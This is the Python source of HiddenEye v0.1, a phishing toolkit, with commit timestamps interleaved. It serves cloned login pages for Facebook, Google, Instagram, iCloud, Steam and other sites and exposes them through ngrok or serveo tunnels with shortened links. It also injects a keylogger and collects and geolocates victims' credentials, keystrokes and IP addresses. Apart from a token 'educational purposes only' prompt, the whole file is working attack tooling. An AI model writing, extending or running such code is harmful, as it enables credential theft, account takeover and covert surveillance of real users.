2018-10-29 03:49:19 +08:00
#Any actions must be here
from os import system , path
from distutils . dir_util import copy_tree
from time import sleep
import re
import json
from urllib . request import urlopen
from subprocess import check_output
from sys import stdout , argv
2018-10-29 04:30:33 +08:00
from Defs . Configurations import readConfig , ifSettingsNotExists
2018-10-29 03:49:19 +08:00
RED , WHITE , CYAN , GREEN , DEFAULT = ' \033 [91m ' , ' \033 [46m ' , ' \033 [36m ' , ' \033 [1;32m ' , ' \033 [0m '
2018-10-29 04:30:33 +08:00
ifSettingsNotExists ( )
2018-10-29 03:49:19 +08:00
config = readConfig ( )
logFile = None
didBackground = config . get ( " Settings " , " DidBackground " )
for arg in argv :
if arg == " --nolog " : #If true - don't log
didBackground = False
if config . get ( " Settings " , " DidBackground " ) == " True " :
logFile = open ( " log.txt " , " w " )
def runPhishing ( page , customOption ) : #Phishing pages selection menu
system ( ' rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ ' )
if customOption == ' 1 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_standard/ " , " Server/www/ " )
if customOption == ' 2 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_advanced_poll/ " , " Server/www/ " )
if customOption == ' 3 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_security_fake/ " , " Server/www/ " )
if customOption == ' 4 ' and page == ' Facebook ' :
copy_tree ( " WebPages/fb_messenger/ " , " Server/www/ " )
elif customOption == ' 1 ' and page == ' Google ' :
copy_tree ( " WebPages/google_standard/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' Google ' :
copy_tree ( " WebPages/google_advanced_poll/ " , " Server/www/ " )
elif customOption == ' 3 ' and page == ' Google ' :
copy_tree ( " WebPages/google_advanced_web/ " , " Server/www/ " )
elif page == ' LinkedIn ' :
copy_tree ( " WebPages/linkedin/ " , " Server/www/ " )
elif page == ' GitHub ' :
copy_tree ( " WebPages/GitHub/ " , " Server/www/ " )
elif page == ' StackOverflow ' :
copy_tree ( " WebPages/stackoverflow/ " , " Server/www/ " )
elif page == ' WordPress ' :
copy_tree ( " WebPages/wordpress/ " , " Server/www/ " )
elif page == ' Twitter ' :
copy_tree ( " WebPages/twitter/ " , " Server/www/ " )
elif page == ' Snapchat ' :
copy_tree ( " WebPages/Snapchat_web/ " , " Server/www/ " )
elif page == ' Yahoo ' :
copy_tree ( " WebPages/yahoo_web/ " , " Server/www/ " )
elif page == ' Twitch ' :
copy_tree ( " WebPages/twitch/ " , " Server/www/ " )
elif page == ' Microsoft ' :
copy_tree ( " WebPages/live_web/ " , " Server/www/ " )
elif page == ' Steam ' :
copy_tree ( " WebPages/steam/ " , " Server/www/ " )
elif page == ' iCloud ' :
copy_tree ( " WebPages/iCloud/ " , " Server/www/ " )
elif customOption == ' 1 ' and page == ' Instagram ' :
copy_tree ( " WebPages/Instagram_web/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' Instagram ' :
copy_tree ( " WebPages/Instagram_autoliker/ " , " Server/www/ " )
elif customOption == ' 1 ' and page == ' VK ' :
copy_tree ( " WebPages/VK/ " , " Server/www/ " )
elif customOption == ' 2 ' and page == ' VK ' :
copy_tree ( " WebPages/VK_poll_method/ " , " Server/www/ " )
def selectServer ( ) : #Question where user must select server
print ( " \n {0} Please select any available server: {1} " . format ( RED , DEFAULT ) )
print ( " \n {0} [ {1} 1 {0} ] {1} Ngrok \n {0} [ {1} 2 {0} ] {1} Serveo " . format ( RED , DEFAULT ) )
2018-10-30 05:23:45 +08:00
choice = input ( " \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
2018-10-29 03:49:19 +08:00
if choice == ' 1 ' :
runNgrok ( )
elif choice == ' 2 ' :
runServeo ( )
else :
system ( ' clear ' )
return selectServer ( )
def runNgrok ( ) :
system ( ' ./Server/ngrok http 1111 > /dev/null & ' )
while True :
sleep ( 2 )
system ( ' curl -s -N http://127.0.0.1:4040/status | grep " https://[0-9a-z]* \ .ngrok.io " -oh > ngrok.url ' )
urlFile = open ( ' ngrok.url ' , ' r ' )
url = urlFile . read ( )
urlFile . close ( )
if re . match ( " https://[0-9a-z]* \ .ngrok.io " , url ) != None :
print ( " \n {0} [ {1} * {0} ] {1} Ngrok URL: {2} " . format ( RED , DEFAULT , GREEN ) + url + " {1} " . format ( RED , DEFAULT , GREEN ) )
link = check_output ( " curl -s ' http://tinyurl.com/api-create.php?url= ' " + url , shell = True ) . decode ( ) . replace ( ' http ' , ' https ' )
print ( " \n {0} [ {1} * {0} ] {1} TINYURL: {2} " . format ( RED , DEFAULT , GREEN ) + link + " {1} " . format ( RED , DEFAULT , GREEN ) )
print ( " \n " )
break
def runServeo ( ) :
system ( ' ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null & ' )
sleep ( 7 )
output = check_output ( " grep -o ' https://[0-9a-z]* \ .serveo.net ' link.url " , shell = True )
url = str ( output ) . strip ( " b ' \ n " )
print ( " \n {0} [ {1} * {0} ] {1} SERVEO URL: {2} " . format ( RED , DEFAULT , GREEN ) + url + " {1} " . format ( RED , DEFAULT , GREEN ) )
link = check_output ( " curl -s ' http://tinyurl.com/api-create.php?url= ' " + url , shell = True ) . decode ( ) . replace ( ' http ' , ' https ' )
print ( " \n {0} [ {1} * {0} ] {1} TINYURL: {2} " . format ( RED , DEFAULT , GREEN ) + link + " {1} " . format ( RED , DEFAULT , GREEN ) )
print ( " \n " )
def runMainMenu ( ) : #menu where user select what they wanna use
system ( ' clear ' )
print ( '''
{ 1 } < == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == = >
| | | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ { 1 } | |
{ 1 } | | █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 3 } █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ { 1 } | |
| | | |
< == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == = >
2018-10-29 05:15:00 +08:00
v { 3 } 0 { 1 } . { 3 } 1 { 1 } . { 3 } 0 { 1 } by Open Source Community { 2 }
2018-10-29 03:49:19 +08:00
_________________________________________________________________________________
{ 0 } [ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{ 0 } A KEYLOGGER WILL BE DEPLOYED FOR YOU , TO CAPTURE EVERY KEYSTROKE ]
_________________________________________________________________________________
{ 1 } ''' .format(GREEN, DEFAULT, CYAN, RED))
for i in range ( 101 ) :
sleep ( 0.01 )
stdout . write ( " \r {0} [ {1} * {0} ] {1} Preparing environment... %d %% " . format ( RED , DEFAULT ) % i )
stdout . flush ( )
print ( " \n \n {0} [ {1} * {0} ] {1} Searching for PHP installation... " . format ( RED , DEFAULT ) )
if 256 != system ( ' which php ' ) : #Checking if user have PHP
print ( " -- {0} > {1} OK. " . format ( CYAN , DEFAULT ) )
else :
print ( " -- {0} > {1} PHP NOT FOUND: \n {0} * {1} Please install PHP and run me again.http://www.php.net/ " . format ( CYAN , DEFAULT ) )
exit ( 0 )
if input ( " {2} [ {1} ! {2} ] {1} Do you agree to use this tool for educational purposes only? ( {2} y {1} / {0} n {1} ) \n {2} HiddenEye >>> {1} " . format ( CYAN , DEFAULT , RED ) ) . upper ( ) != ' Y ' : #Question where user must accept education purposes
system ( ' clear ' )
print ( ' \n [ {0} YOU ARE NOT AUTHORIZED TO USE THIS TOOL. GOOD BYE! {1} ] \n ' . format ( CYAN , DEFAULT ) )
exit ( 0 )
option = input ( " \n Select an option: \n \n {0} [ {1} 1 {0} ] {1} Facebook \n \n {0} [ {1} 2 {0} ] {1} Google \n \n {0} [ {1} 3 {0} ] {1} LinkedIn \n \n {0} [ {1} 4 {0} ] {1} GitHub \n \n {0} [ {1} 5 {0} ] {1} StackOverflow \n \n {0} [ {1} 6 {0} ] {1} WordPress \n \n {0} [ {1} 7 {0} ] {1} Twitter \n \n {0} [ {1} 8 {0} ] {1} Instagram \n \n {0} [ {1} 9 {0} ] {1} Snapchat \n \n {0} [ {1} 10 {0} ] {1} Yahoo \n \n {0} [ {1} 11 {0} ] {1} Twitch \n \n {0} [ {1} 12 {0} ] {1} Microsoft \n \n {0} [ {1} 13 {0} ] {1} Steam \n \n {0} [ {1} 14 {0} ] {1} VK \n \n {0} [ {1} 15 {0} ] {1} iCloud \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! \n \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
if option == ' 1 ' :
loadModule ( ' Facebook ' )
customOption = input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} Facebook Phishing- Fake Security issue(security_mode) \n \n {0} [ {1} 4 {0} ] {1} Facebook Phising-Messenger Credentials(messenger_mode) \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
runPhishing ( ' Facebook ' , customOption )
elif option == ' 2 ' :
loadModule ( ' Google ' )
customOption = input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing(poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} New Google Web \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
runPhishing ( ' Google ' , customOption )
elif option == ' 3 ' :
loadModule ( ' LinkedIn ' )
customOption = ' '
runPhishing ( ' LinkedIn ' , customOption )
elif option == ' 4 ' :
loadModule ( ' GitHub ' )
customOption = ' '
runPhishing ( ' GitHub ' , customOption )
elif option == ' 5 ' :
loadModule ( ' StackOverflow ' )
customOption = ' '
runPhishing ( ' StackOverflow ' , customOption )
elif option == ' 6 ' :
loadModule ( ' WordPress ' )
customOption = ' '
runPhishing ( ' WordPress ' , customOption )
elif option == ' 7 ' :
loadModule ( ' Twitter ' )
customOption = ' '
runPhishing ( ' Twitter ' , customOption )
elif option == ' 8 ' :
loadModule ( ' Instagram ' )
customOption = input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Instagram Web Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Instagram Autoliker Phising (After submit redirects to original autoliker) \n \n {0} [ {1} -------------> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} HIddenEye >>> {1} " . format ( RED , DEFAULT ) )
runPhishing ( ' Instagram ' , customOption )
elif option == ' 9 ' :
loadModule ( ' Snapchat ' )
customOption = ' '
runPhishing ( ' Snapchat ' , customOption )
elif option == ' 10 ' :
loadModule ( ' Yahoo ' )
customOption = ' '
runPhishing ( ' Yahoo ' , customOption )
elif option == ' 11 ' :
loadModule ( ' Twitch ' )
customOption = ' '
runPhishing ( ' Twitch ' , customOption )
elif option == ' 12 ' :
loadModule ( ' Microsoft ' )
customOption = ' '
runPhishing ( ' Microsoft ' , customOption )
elif option == ' 13 ' :
loadModule ( ' Steam ' )
customOption = ' '
runPhishing ( ' Steam ' , customOption )
elif option == ' 14 ' :
loadModule ( ' VK ' )
customOption = input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard VK Web Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing(poll_mode/login_with) \n \n {0} [ {1} -------------> {0} ] {1} More Phising Scripts COMMING SOON ! \n \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
runPhishing ( ' VK ' , customOption )
elif option == ' 15 ' :
loadModule ( ' iCloud ' )
customOption = ' '
runPhishing ( ' iCloud ' , customOption )
else :
exit ( 0 )
def loadModule ( module ) : #This one just show text..
print ( ''' {0}
[ { 1 } * { 0 } ] module loaded . Building site . . . { 0 } ''' .format(RED, DEFAULT))
def inputCustom ( ) : #Question where user can input custom web-link
print ( " \n {0} Insert a custom redirect url: " . format ( RED , DEFAULT ) )
custom = input ( " \n {0} HiddenEye >>> {1} " . format ( RED , DEFAULT ) )
if ' http:// ' or ' https:// ' in custom :
pass
else :
custom = ' http:// ' + custom
if path . exists ( ' Server/www/post.php ' ) and path . exists ( ' Server/www/login.php ' ) :
with open ( ' Server/www/login.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/login.php ' , ' w ' )
f . write ( c )
f . close ( )
with open ( ' Server/www/post.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/post.php ' , ' w ' )
f . write ( c )
f . close ( )
else :
with open ( ' Server/www/login.php ' ) as f :
read_data = f . read ( )
c = read_data . replace ( ' <CUSTOM> ' , custom )
f = open ( ' Server/www/login.php ' , ' w ' )
f . write ( c )
f . close ( )
def runServer ( ) :
system ( " cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 & " )
2018-10-30 05:23:45 +08:00
def endMessage ( ) : #Message when HiddenEye exit
2018-10-29 03:49:19 +08:00
system ( ' clear ' )
print ( '''
{ 1 } _ . . . . ~ ~ ~ ~ == == = ~ ~ ~ ~ . . . . _
. ' ========= {3} /----= \ {1} =========>
/ := == == == == { 3 } / - - - - - == == \{ 1 }
| == == == == == { 3 } | - - - - - == == == | { 1 } == == == == == >
\:= == == == == { 3 } \- - - == == == / { 1 }
\== == == == == { 3 } \== == = / { 1 } == == == == == >
` ` ` ` ~ ~ ~ ~ == == == = ~ ~ ~ ~ ` ` ` `
{ 3 } HIDDEN EYE { 1 } v { 3 } 0 { 1 } . { 3 } 1
{ 0 } NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{ 0 } A KEYLOGGER IS DEPLOYED FOR YOU , TO CAPTURE EVERY KEYSTROKE ]
[ { 0 } Some more phising pages have been added in script . For a better Attack ]
[ { 0 } Welcome to HIDDEN EYE V0 .1 \n { 1 } ''' .format(GREEN, DEFAULT, CYAN, RED))
def getCredentials ( ) :
print ( " {0} [ {1} * {0} ] {1} Everything has been completed.............. " . format ( RED , DEFAULT ) )
print ( ''' {0}
[ { 1 } * { 0 } ] { 1 } WE HAVE ALSO DEPLOYED A KEYLOGGER . .
[ { 1 } * { 0 } ] { 1 } YOU WILL GET VICTIM ' S DEVICES INFO. {0} ' ' ' . format ( RED , DEFAULT ) )
print ( " {0} [ {1} * {0} ] {1} Waiting for credentials//Pressed keys//Victim ' s device info... \n " . format ( RED , DEFAULT ) )
while True :
with open ( ' Server/www/usernames.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
writeLog ( ' {0} [ CREDENTIALS FOUND ] {1} : \n {0} %s {1} ' . format ( GREEN , DEFAULT ) % lines )
system ( ' rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt ' )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
creds . close ( )
with open ( ' Server/www/ip.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
ip = re . match ( ' Victim Public IP: (.*?) \n ' , lines ) . group ( 1 )
resp = urlopen ( ' https://ipinfo.io/ %s /json ' % ip )
ipinfo = json . loads ( resp . read ( ) . decode ( resp . info ( ) . get_param ( ' charset ' ) or ' utf-8 ' ) )
if ' bogon ' in ipinfo :
log ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
log ( ' \n {0} [ VICTIM IP BONUS ] {1} : \n {0} %s {1} ' . format ( GREEN , DEFAULT ) % lines )
else :
matchObj = re . match ( ' ^(.*?),(.*)$ ' , ipinfo [ ' loc ' ] )
latitude = matchObj . group ( 1 )
longitude = matchObj . group ( 2 )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
writeLog ( ' \n {0} [ VICTIM INFO FOUND ] {1} : \n {0} %s {1} ' . format ( GREEN , DEFAULT ) % lines )
writeLog ( ' \n {0} Longitude: %s \n Latitude: %s {1} ' . format ( GREEN , DEFAULT ) % ( longitude , latitude ) )
writeLog ( ' \n {0} ISP: %s \n Country: %s {1} ' . format ( GREEN , DEFAULT ) % ( ipinfo [ ' org ' ] , ipinfo [ ' country ' ] ) )
writeLog ( ' \n {0} Region: %s \n City: %s {1} ' . format ( GREEN , DEFAULT ) % ( ipinfo [ ' region ' ] , ipinfo [ ' city ' ] ) )
system ( ' rm -rf Server/www/ip.txt && touch Server/www/ip.txt ' )
writeLog ( ' ====================================================================== ' . format ( RED , DEFAULT ) )
creds . close ( )
with open ( ' Server/www/KeyloggerData.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
writeLog ( ' ______________________________________________________________________ ' . format ( RED , DEFAULT ) )
writeLog ( ' {0} [ GETTING PRESSED KEYS ] {1} : \n {0} %s {1} ' . format ( GREEN , DEFAULT ) % lines )
system ( ' rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt ' )
writeLog ( ' ______________________________________________________________________ ' . format ( RED , DEFAULT ) )
creds . close ( )
def writeLog ( ctx ) : #Writing log
if config . get ( " Settings " , " DidBackground " ) == " True " : #if didBackground == True, write
logFile . write ( ctx . replace ( RED , " " ) . replace ( WHITE , " " ) . replace ( CYAN , " " ) . replace ( GREEN , " " ) . replace ( DEFAULT , " " ) + " \n " )
print ( ctx )